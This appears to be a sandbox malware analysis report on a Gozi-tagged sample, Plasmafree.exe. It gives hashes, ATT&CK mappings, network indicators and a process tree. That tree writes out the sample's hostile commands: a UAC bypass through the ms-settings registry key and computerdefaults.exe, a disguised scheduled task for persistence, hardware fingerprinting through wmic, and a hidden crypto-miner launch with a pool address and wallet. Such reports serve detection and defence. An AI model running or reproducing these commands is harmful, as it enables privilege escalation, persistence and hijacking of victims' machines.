gozi | 76397d748732f6ddf04130c19634808852d73711f6ee4d2829c171c2510cea7f

Analysis

max time kernel
630s
max time network
625s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
31-05-2024 21:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Plasmafree.exe
Size

16KB
MD5

40e2ed614058109b9b93a33cb8787277
SHA1

503260dd9d33f949613fceef68b6143d8049d913
SHA256

76397d748732f6ddf04130c19634808852d73711f6ee4d2829c171c2510cea7f
SHA512

cff8562ef36ba896e546add6f303999a2b09c263ab8b6cb2b9907e3d6835c0af0aa4575639d5e3a0690f77cc8061027465db9621d2a7ecdb8d4261def16a2d28
SSDEEP

384:Qd3kw7ShTvn9G7851TzZfvw1+zWsptYcFwVc03K:Q7ShTy85RlfvwkDtYcFwVc6K

Score

10^/10

gozi banker isfb persistence spyware stealer trojan

Malware Config

Extracted

Family

gozi

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

runtimedotnet.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\fYBFndYoGcuiLjDLZw\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\fYBFndYoGcuiLjDLZw"	runtimedotnet.exe

Executes dropped EXE 10 IoCs

Processes:

runtimedotnet.exeVOLUMEID.exe05idezac.exeVOLUMEID.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exe

pid	process
308	runtimedotnet.exe
3116	VOLUMEID.exe
4988	05idezac.exe
3128	VOLUMEID.exe
356	MNRk6q28sfoCKrqzM050MX.exe
4220	MNRk6q28sfoCKrqzM050MX.exe
3332	MNRk6q28sfoCKrqzM050MX.exe
3632	MNRk6q28sfoCKrqzM050MX.exe
2944	MNRk6q28sfoCKrqzM050MX.exe
2668	MNRk6q28sfoCKrqzM050MX.exe

Loads dropped DLL 1 IoCs

Processes:

VOLUMEID.exe

pid process

3116 VOLUMEID.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service
T1102

Processes:

flow ioc

37 discord.com
39 discord.com
43 discord.com
21 raw.githubusercontent.com
22 raw.githubusercontent.com
27 discord.com
28 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

33 checkip.amazonaws.com

pid	process
3116	VOLUMEID.exe

flow	ioc
37	discord.com
39	discord.com
43	discord.com
21	raw.githubusercontent.com
22	raw.githubusercontent.com
27	discord.com
28	discord.com

flow	ioc
33	checkip.amazonaws.com

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

Processes:

MNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exe

pid	process
356	MNRk6q28sfoCKrqzM050MX.exe
356	MNRk6q28sfoCKrqzM050MX.exe
4220	MNRk6q28sfoCKrqzM050MX.exe
4220	MNRk6q28sfoCKrqzM050MX.exe
3332	MNRk6q28sfoCKrqzM050MX.exe
3332	MNRk6q28sfoCKrqzM050MX.exe
3632	MNRk6q28sfoCKrqzM050MX.exe
3632	MNRk6q28sfoCKrqzM050MX.exe
2944	MNRk6q28sfoCKrqzM050MX.exe
2944	MNRk6q28sfoCKrqzM050MX.exe
2668	MNRk6q28sfoCKrqzM050MX.exe
2668	MNRk6q28sfoCKrqzM050MX.exe

Drops file in Windows directory 3 IoCs

Processes:

Plasmafree.exe

description	ioc	process
File created	C:\Windows\Tasks\VOLUMEID.exe	Plasmafree.exe
File created	C:\Windows\GameBarPresenceWriter\drive.sys	Plasmafree.exe
File created	C:\Windows\GameBarPresenceWriter\runtimedotnet.exe	Plasmafree.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2064 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

5000 taskkill.exe
5016 taskkill.exe

pid	process
2064	schtasks.exe

pid	process
5000	taskkill.exe
5016	taskkill.exe

Modifies registry class 8 IoCs

Processes:

reg.exereg.exeExplorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\quarterturkey168.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

runtimedotnet.exeVOLUMEID.exe05idezac.exe

pid	process
308	runtimedotnet.exe
308	runtimedotnet.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
4988	05idezac.exe
4988	05idezac.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe
3116	VOLUMEID.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3416 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

runtimedotnet.exe

pid process

308 runtimedotnet.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exePlasmafree.exetaskkill.exeruntimedotnet.exewmic.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1240	wmic.exe
Token: SeSecurityPrivilege	1240	wmic.exe
Token: SeTakeOwnershipPrivilege	1240	wmic.exe
Token: SeLoadDriverPrivilege	1240	wmic.exe
Token: SeSystemProfilePrivilege	1240	wmic.exe
Token: SeSystemtimePrivilege	1240	wmic.exe
Token: SeProfSingleProcessPrivilege	1240	wmic.exe
Token: SeIncBasePriorityPrivilege	1240	wmic.exe
Token: SeCreatePagefilePrivilege	1240	wmic.exe
Token: SeBackupPrivilege	1240	wmic.exe
Token: SeRestorePrivilege	1240	wmic.exe
Token: SeShutdownPrivilege	1240	wmic.exe
Token: SeDebugPrivilege	1240	wmic.exe
Token: SeSystemEnvironmentPrivilege	1240	wmic.exe
Token: SeRemoteShutdownPrivilege	1240	wmic.exe
Token: SeUndockPrivilege	1240	wmic.exe
Token: SeManageVolumePrivilege	1240	wmic.exe
Token: 33	1240	wmic.exe
Token: 34	1240	wmic.exe
Token: 35	1240	wmic.exe
Token: 36	1240	wmic.exe
Token: SeIncreaseQuotaPrivilege	1240	wmic.exe
Token: SeSecurityPrivilege	1240	wmic.exe
Token: SeTakeOwnershipPrivilege	1240	wmic.exe
Token: SeLoadDriverPrivilege	1240	wmic.exe
Token: SeSystemProfilePrivilege	1240	wmic.exe
Token: SeSystemtimePrivilege	1240	wmic.exe
Token: SeProfSingleProcessPrivilege	1240	wmic.exe
Token: SeIncBasePriorityPrivilege	1240	wmic.exe
Token: SeCreatePagefilePrivilege	1240	wmic.exe
Token: SeBackupPrivilege	1240	wmic.exe
Token: SeRestorePrivilege	1240	wmic.exe
Token: SeShutdownPrivilege	1240	wmic.exe
Token: SeDebugPrivilege	1240	wmic.exe
Token: SeSystemEnvironmentPrivilege	1240	wmic.exe
Token: SeRemoteShutdownPrivilege	1240	wmic.exe
Token: SeUndockPrivilege	1240	wmic.exe
Token: SeManageVolumePrivilege	1240	wmic.exe
Token: 33	1240	wmic.exe
Token: 34	1240	wmic.exe
Token: 35	1240	wmic.exe
Token: 36	1240	wmic.exe
Token: SeDebugPrivilege	3764	Plasmafree.exe
Token: SeDebugPrivilege	5000	taskkill.exe
Token: SeLoadDriverPrivilege	308	runtimedotnet.exe
Token: SeIncreaseQuotaPrivilege	2720	wmic.exe
Token: SeSecurityPrivilege	2720	wmic.exe
Token: SeTakeOwnershipPrivilege	2720	wmic.exe
Token: SeLoadDriverPrivilege	2720	wmic.exe
Token: SeSystemProfilePrivilege	2720	wmic.exe
Token: SeSystemtimePrivilege	2720	wmic.exe
Token: SeProfSingleProcessPrivilege	2720	wmic.exe
Token: SeIncBasePriorityPrivilege	2720	wmic.exe
Token: SeCreatePagefilePrivilege	2720	wmic.exe
Token: SeBackupPrivilege	2720	wmic.exe
Token: SeRestorePrivilege	2720	wmic.exe
Token: SeShutdownPrivilege	2720	wmic.exe
Token: SeDebugPrivilege	2720	wmic.exe
Token: SeSystemEnvironmentPrivilege	2720	wmic.exe
Token: SeRemoteShutdownPrivilege	2720	wmic.exe
Token: SeUndockPrivilege	2720	wmic.exe
Token: SeManageVolumePrivilege	2720	wmic.exe
Token: 33	2720	wmic.exe
Token: 34	2720	wmic.exe

Suspicious use of SetWindowsHookEx 25 IoCs

Processes:

Explorer.EXEVOLUMEID.exe

pid	process
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3116	VOLUMEID.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Plasmafree.execmd.execmd.execmd.exeVOLUMEID.exe

description	pid	process	target process
PID 3764 wrote to memory of 1240	3764	Plasmafree.exe	wmic.exe
PID 3764 wrote to memory of 1240	3764	Plasmafree.exe	wmic.exe
PID 3764 wrote to memory of 1240	3764	Plasmafree.exe	wmic.exe
PID 3764 wrote to memory of 4652	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4652	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4652	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4492	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4492	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4492	3764	Plasmafree.exe	cmd.exe
PID 4492 wrote to memory of 5000	4492	cmd.exe	taskkill.exe
PID 4492 wrote to memory of 5000	4492	cmd.exe	taskkill.exe
PID 4492 wrote to memory of 5000	4492	cmd.exe	taskkill.exe
PID 3764 wrote to memory of 308	3764	Plasmafree.exe	runtimedotnet.exe
PID 3764 wrote to memory of 308	3764	Plasmafree.exe	runtimedotnet.exe
PID 3764 wrote to memory of 4536	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4536	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4536	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4468	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4468	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 4468	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 2720	3764	Plasmafree.exe	wmic.exe
PID 3764 wrote to memory of 2720	3764	Plasmafree.exe	wmic.exe
PID 3764 wrote to memory of 2720	3764	Plasmafree.exe	wmic.exe
PID 4468 wrote to memory of 5016	4468	cmd.exe	taskkill.exe
PID 4468 wrote to memory of 5016	4468	cmd.exe	taskkill.exe
PID 4468 wrote to memory of 5016	4468	cmd.exe	taskkill.exe
PID 3764 wrote to memory of 5024	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 5024	3764	Plasmafree.exe	cmd.exe
PID 3764 wrote to memory of 5024	3764	Plasmafree.exe	cmd.exe
PID 5024 wrote to memory of 4668	5024	cmd.exe	mode.com
PID 5024 wrote to memory of 4668	5024	cmd.exe	mode.com
PID 5024 wrote to memory of 4668	5024	cmd.exe	mode.com
PID 5024 wrote to memory of 3636	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3636	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3636	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 872	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 872	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 872	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 1348	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 1348	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 1348	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 2360	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 2360	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 2360	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 4556	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 4556	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 4556	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3408	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3408	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3408	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3456	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3456	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3456	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3532	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3532	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 3532	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 2200	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 2200	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 2200	5024	cmd.exe	WMIC.exe
PID 3116 wrote to memory of 2668	3116	VOLUMEID.exe	reg.exe
PID 3116 wrote to memory of 2668	3116	VOLUMEID.exe	reg.exe
PID 3116 wrote to memory of 2668	3116	VOLUMEID.exe	reg.exe
PID 3116 wrote to memory of 3928	3116	VOLUMEID.exe	reg.exe
PID 3116 wrote to memory of 3928	3116	VOLUMEID.exe	reg.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3416

C:\Users\Admin\AppData\Local\Temp\Plasmafree.exe
"C:\Users\Admin\AppData\Local\Temp\Plasmafree.exe"
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" diskdrive get serialnumber
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" C:\Windows\VOLUMEID.exe
3⤵
PID:4652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im VOLUMEID.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im VOLUMEID.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Windows\GameBarPresenceWriter\runtimedotnet.exe
"C:\Windows\GameBarPresenceWriter\runtimedotnet.exe" C:\Windows\GameBarPresenceWriter\drive.sys
3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" C:\Windows\VOLUMEID.exe
3⤵
PID:4536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im VOLUMEID.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im VOLUMEID.exe
4⤵
- Kills process with taskkill
PID:5016

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" diskdrive get serialnumber
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\plasmaserial.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:5024

C:\Windows\SysWOW64\mode.com
mode con: cols=90 lines=48
4⤵
PID:4668

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic bios get serialnumber
4⤵
PID:3636

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:872

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get serialnumber
4⤵
PID:1348

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get processorid
4⤵
PID:2360

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic diskdrive get serialnumber
4⤵
PID:4556

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic baseboard get serialnumber
4⤵
PID:3408

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic memorychip get serialnumber
4⤵
PID:3456

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter where "PNPDeviceID like '%PCI%' AND NetConnectionStatus=2 AND AdapterTypeID='0'" get MacAddress
4⤵
PID:3532

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
4⤵
PID:2200

C:\Windows\Tasks\VOLUMEID.exe
"C:\Windows\Tasks\VOLUMEID.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\quarterturkey168.vbs" /f
3⤵
- Modifies registry class
PID:2668

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
3⤵
- Modifies registry class
PID:3928

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
3⤵
PID:1036

C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
4⤵
PID:696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN CCleanerUpdateTask_bubk6q28sfoCKrqzM050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Edge\bubk6q28sfoCKrqzM050MX.exe" /RL HIGHEST /IT
3⤵
PID:440

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN CCleanerUpdateTask_bubk6q28sfoCKrqzM050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Edge\bubk6q28sfoCKrqzM050MX.exe" /RL HIGHEST /IT
4⤵
- Creates scheduled task(s)
PID:2064

C:\Users\Admin\AppData\Local\Temp\05idezac.exe
"C:\Users\Admin\AppData\Local\Temp\05idezac.exe" explorer.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig
3⤵
PID:1848

C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:356

C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig -RUN -reboot-times 0
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4220

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig
3⤵
PID:2208

C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3332

C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig -RUN -reboot-times 0
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig
3⤵
PID:2452

C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2944

C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig -RUN -reboot-times 0
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2668

C:\Users\Admin\Downloads\VOLUMEID.exe
"C:\Users\Admin\Downloads\VOLUMEID.exe"
2⤵
- Executes dropped EXE
PID:3128

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe
Filesize
11.4MB

MD5
a7400236ffab02ae5af5c9a0f61e7300

SHA1
e3a6e33cb751dd81f4f6a62405df2930e9ede400

SHA256
bb3af0c03e6b0833fa268d98e5a8b19e78fb108a830b58b2ade50c57e9fc9bed

SHA512
28bcef5cd4d01b8582a13538b893a96a1d86a07a9b91672f1602d3d5cc0806aaec00e9fa64b7852294dec3f0aa27045ba19d65869d4c4ba4bc3ce68ade8e5ebd

Download Submit
C:\Users\Admin\AppData\Local\Temp\05idezac.exe
Filesize
124KB

MD5
e898826598a138f86f2aa80c0830707a

SHA1
1e912a5671f7786cc077f83146a0484e5a78729c

SHA256
df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a

SHA512
6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\4f74f52aefc645e6931adfcb2ebb1cce
Filesize
136KB

MD5
6fe2c73cc7ec5510acb6480af96d6ec4

SHA1
41bacf8aa8e0effac4c9a7a066de2b5092e349a3

SHA256
cf4131048930daa4351ca09f9c46ed829f05c87762569650a8c374c1b3ad8773

SHA512
f558bdee86fe68986e81b53b6f72624ae11c90992daaabbf1e572357a7a8ba08b7dccd46d83cb4528efa5c9c529421ab3cad6f64e849c01391bf5380e28ad3fc

Download Submit
C:\Users\Admin\AppData\Roaming\Gongle\a24OXREXEU\wjyk7j4u.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Filesize
48KB

MD5
854a10c0922c27cfeffb77307ee80a71

SHA1
bb8cbe8467bfc490031e29fb27fe50ec014f53e2

SHA256
f696b1fa16384ecdec974e1bc9a8841fd50cb739818654dc3c7716821d52f69b

SHA512
a5004751e3b89fdf4ce49492c46d09eca1a0177c57cacc6546deb236a17c747600748537687713516565330907a2541d3bba4b96cc3b106d589e38ef09b86162

Download Submit
C:\Users\Admin\AppData\Roaming\Gongle\aCZSJZWJ81\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Roaming\Gongle\aCZSJZWJ81\LOG
Filesize
329B

MD5
0190ee80d78a4e94abe1d1908a3a7ffe

SHA1
0a92361ec9c7912c555a43d49cb08ef2ec81dab5

SHA256
fd31d41e012b325b39063bec362e0030703b0fc1d67eff11ab2e4e2a01fd27a8

SHA512
9960e1528acadd2a572ed01b48d0f9a1142fd248565972ba2f368af2e3f95d1fe8b2d62511668b9fcd07bdeeafde64c5758de451fba6c6c3817876d1eae7b774

Download Submit
